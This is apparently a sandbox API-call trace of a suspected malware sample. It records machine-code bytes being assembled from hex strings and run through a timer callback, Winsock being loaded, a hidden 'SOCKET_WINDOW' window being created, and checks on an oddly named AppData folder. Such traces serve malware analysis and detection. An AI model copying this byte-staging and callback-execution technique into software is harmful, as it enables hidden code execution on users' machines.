GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.302] GetUserDefaultLCID () returned 0x409 [0200.302] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.303] VarI2FromStr (in: strIn="&H0C", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.303] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.303] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.303] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.303] VarI2FromStr (in: strIn="&H68", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.303] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.304] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.304] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.304] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.304] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&HB8", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.304] GetUserDefaultLCID () returned 0x409 [0200.304] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&HD0", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.305] GetUserDefaultLCID () returned 0x409 [0200.305] VarI2FromStr (in: strIn="&HC9", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.306] GetUserDefaultLCID () returned 0x409 [0200.306] VarI2FromStr (in: strIn="&HC2", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.306] GetUserDefaultLCID () returned 0x409 [0200.306] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.306] GetUserDefaultLCID () returned 0x409 [0200.306] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.306] RtlMoveMemory (in: Destination=0x6d2081, Source=0x30f4e8, Length=0x4 | out: Destination=0x6d2081) [0200.306] GetLastError () returned 0x0 [0200.306] RtlMoveMemory (in: Destination=0x6d2086, Source=0x30f438, Length=0x4 | out: Destination=0x6d2086) [0200.306] GetLastError () returned 0x0 [0200.306] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x6ca438 [0200.307] IMalloc:Alloc (This=0x75e366bc, cb=0x14) returned 0x6d2f58 [0200.307] IMalloc:Free (This=0x75e366bc, pv=0x6ca438) [0200.307] IMalloc:Free (This=0x75e366bc, pv=0x6d2f58) [0200.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.307] IMalloc:Alloc (This=0x75e366bc, cb=0x54) returned 0x6d1678 [0200.307] IMalloc:GetSize (This=0x75e366bc, pv=0x6d1678) returned 0x54 [0200.307] RtlMoveMemory (in: Destination=0x30f354, Source=0x6d1678, Length=0x4 | out: Destination=0x30f354) [0200.307] GetLastError () returned 0x0 [0200.307] RtlMoveMemory (in: Destination=0x30f350, Source=0x440758, Length=0x4 | out: Destination=0x30f350) [0200.307] GetLastError () returned 0x0 [0200.307] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x6d16b4 | out: ppsaOut=0x6d16b4) returned 0x0 [0200.307] GetUserDefaultLCID () returned 0x409 [0200.307] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&HEC", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&H50", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.308] GetUserDefaultLCID () returned 0x409 [0200.308] VarI2FromStr (in: strIn="&H14", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.309] GetUserDefaultLCID () returned 0x409 [0200.309] VarI2FromStr (in: strIn="&H0C", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&H68", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.310] GetUserDefaultLCID () returned 0x409 [0200.310] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&HB8", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.311] GetUserDefaultLCID () returned 0x409 [0200.311] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&HD0", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&HC9", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&HC2", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.312] GetUserDefaultLCID () returned 0x409 [0200.312] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.313] GetUserDefaultLCID () returned 0x409 [0200.313] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x30f3ea | out: psOut=0x30f3ea) returned 0x0 [0200.313] RtlMoveMemory (in: Destination=0x6d2059, Source=0x30f4e8, Length=0x4 | out: Destination=0x6d2059) [0200.313] GetLastError () returned 0x0 [0200.313] RtlMoveMemory (in: Destination=0x6d205e, Source=0x30f438, Length=0x4 | out: Destination=0x6d205e) [0200.313] GetLastError () returned 0x0 [0200.313] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x6ca438 [0200.313] IMalloc:Alloc (This=0x75e366bc, cb=0x14) returned 0x6d2f58 [0200.313] IMalloc:Free (This=0x75e366bc, pv=0x6ca438) [0200.313] IMalloc:Free (This=0x75e366bc, pv=0x6d2f58) [0200.313] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.313] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0200.313] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.313] GetProcAddress (hModule=0x77820000, lpProcName="SetTimer") returned 0x778379fb [0200.313] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x2710, lpTimerFunc=0x6d2048) returned 0x7fbc [0200.314] GetLastError () returned 0x0 [0200.314] SafeArrayAllocDescriptorEx (in: vt=0x8, cDims=0x1, ppsaOut=0x43e11c | out: ppsaOut=0x43e11c) returned 0x0 [0200.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.314] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d78c0 [0200.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.314] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d7930 [0200.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.314] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d79a0 [0200.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.314] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d7a10 [0200.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0200.314] IMalloc:Alloc (This=0x75e366bc, cb=0x68) returned 0x6d7a80 [0200.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=257, lpMultiByteStr=0x30f22c, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 257 [0200.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=129, lpMultiByteStr=0x30f32d, cbMultiByte=129, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 129 [0200.314] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.314] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0200.316] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.317] GetProcAddress (hModule=0x76450000, lpProcName="WSAStartup") returned 0x76453ab2 [0200.317] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x30f228 | out: lpWSAData=0x30f228) returned 0 [0200.359] GetLastError () returned 0x0 [0200.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f22c, cbMultiByte=257, lpWideCharStr=0x30f3bc, cchWideChar=257 | out: lpWideCharStr="WinSock 2.0") returned 257 [0200.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f32d, cbMultiByte=129, lpWideCharStr=0x30f5be, cchWideChar=129 | out: lpWideCharStr="Running") returned 129 [0200.359] SysStringLen (param_1="SOCKET_WINDOW") returned 0xd [0200.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SOCKET_WINDOW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.359] SysStringLen (param_1="SOCKET_WINDOW") returned 0xd [0200.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SOCKET_WINDOW", cchWideChar=14, lpMultiByteStr=0x6d254c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCKET_WINDOW", lpUsedDefaultChar=0x0) returned 14 [0200.359] SysStringLen (param_1="STATIC") returned 0x6 [0200.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="STATIC", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0200.360] SysStringLen (param_1="STATIC") returned 0x6 [0200.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="STATIC", cchWideChar=7, lpMultiByteStr=0x6d20c4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STATIC", lpUsedDefaultChar=0x0) returned 7 [0200.360] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.360] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0200.360] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.360] GetProcAddress (hModule=0x77820000, lpProcName="CreateWindowExA") returned 0x7783d22e [0200.360] CreateWindowExA (dwExStyle=0x0, lpClassName="STATIC", lpWindowName="SOCKET_WINDOW", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x202e0 [0200.362] GetLastError () returned 0x0 [0200.362] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.362] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0200.362] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.362] GetProcAddress (hModule=0x77820000, lpProcName="SetWindowLongA") returned 0x77846110 [0200.362] SetWindowLongA (hWnd=0x202e0, nIndex=-4, dwNewLong=4206032) returned 2011802568 [0200.362] GetLastError () returned 0x0 [0200.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f6b4 | out: ppsaOut=0x30f6b4) returned 0x0 [0200.363] GetUserDefaultLCID () returned 0x409 [0200.363] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f484, cchData=6 | out: lpLCData="1252") returned 5 [0200.363] SysStringLen (param_1="kernel32") returned 0x9 [0200.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.363] SysStringLen (param_1="kernel32") returned 0x9 [0200.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=10, lpMultiByteStr=0x6d2614, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 10 [0200.363] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f494 | out: ppsaOut=0x30f494) returned 0x0 [0200.363] GetUserDefaultLCID () returned 0x409 [0200.363] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f484, cchData=6 | out: lpLCData="1252") returned 5 [0200.363] SysStringLen (param_1="GetFileAttributesW") returned 0x13 [0200.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0200.363] SysStringLen (param_1="GetFileAttributesW") returned 0x13 [0200.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileAttributesW", cchWideChar=20, lpMultiByteStr=0x6d25ec, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileAttributesW", lpUsedDefaultChar=0x0) returned 20 [0200.363] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f494 | out: ppsaOut=0x30f494) returned 0x0 [0200.363] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.363] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0200.364] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.364] GetProcAddress (hModule=0x76220000, lpProcName="GetFileAttributesW") returned 0x76231b18 [0200.364] SafeArrayDestroyDescriptor (psa=0x6d7058) returned 0x0 [0200.364] SafeArrayDestroyDescriptor (psa=0x6d7028) returned 0x0 [0200.364] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441\\ut")) returned 0xffffffff [0200.364] SafeArrayDestroyDescriptor (psa=0x6d6ff8) returned 0x0 [0200.364] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.364] LoadLibraryA (lpLibFileName="KERNEL32") returned 0x76220000 [0200.364] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.365] GetProcAddress (hModule=0x76220000, lpProcName="GetVersion") returned 0x76234467 [0200.365] GetVersion () returned 0x1db10106 [0200.365] GetLastError () returned 0x0 [0200.365] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.365] LoadLibraryA (lpLibFileName="Shell32") returned 0x76b00000 [0200.369] SetErrorMode (uMode=0x8001) returned 0x8001 [0200.369] GetProcAddress (hModule=0x76b00000, lpProcName=0x105) returned 0x76d71a5f [0200.416] SHGetUserPicturePath () returned 0x0 [0202.628] GetLastError () returned 0x0 [0202.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", cchWideChar=-1, lpMultiByteStr=0x30f3b4, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", lpUsedDefaultChar=0x0) returned 50 [0202.629] lstrcpynA (in: lpString1=0x30f2a4, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.629] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned 49 [0202.629] lstrcpyA (in: lpString1=0x3db2b0, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.629] lstrcpynA (in: lpString1=0x30f160, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.629] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned 49 [0202.630] lstrcpyA (in: lpString1=0x3db478, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.630] lstrcpyA (in: lpString1=0x3db4b8, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.630] SetLastError (dwErrCode=0x0) [0202.630] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x3db360, lpFilePart=0x30f260 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", lpFilePart=0x30f260*="aETAdzjz.bmp") returned 0x31 [0202.630] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\aetadzjz.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0202.630] GetLastError () returned 0x0 [0202.630] lstrcpynA (in: lpString1=0x30f16c, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.630] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned 49 [0202.630] lstrcpyA (in: lpString1=0x3db4f8, lpString2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\aETAdzjz.bmp" [0202.630] GetFileType (hFile=0x170) returned 0x1 [0202.630] _llseek (hFile=0x170, lOffset=0, iOrigin=2) returned 49208 [0202.630] _llseek (hFile=0x170, lOffset=0, iOrigin=0) returned 0 [0202.631] _llseek (hFile=0x170, lOffset=0, iOrigin=2) returned 49208 [0202.631] _llseek (hFile=0x170, lOffset=0, iOrigin=0) returned 0 [0202.631] OleLoadPictureEx () returned 0x0 [0202.632] _llseek (hFile=0x170, lOffset=0, iOrigin=0) returned 0 [0202.632] _hread (in: hFile=0x170, lpBuffer=0x3db578, lBytes=49208 | out: lpBuffer=0x3db578*) returned 49208 [0202.681] _lclose (hFile=0x170) returned 0x0 [0202.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", cchWideChar=-1, lpMultiByteStr=0x30f694, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", lpUsedDefaultChar=0x0) returned 74 [0202.681] lstrcpynA (in: lpString1=0x30f584, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.681] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned 73 [0202.682] lstrcpyA (in: lpString1=0x3db2b0, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.682] lstrcpynA (in: lpString1=0x30f440, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") 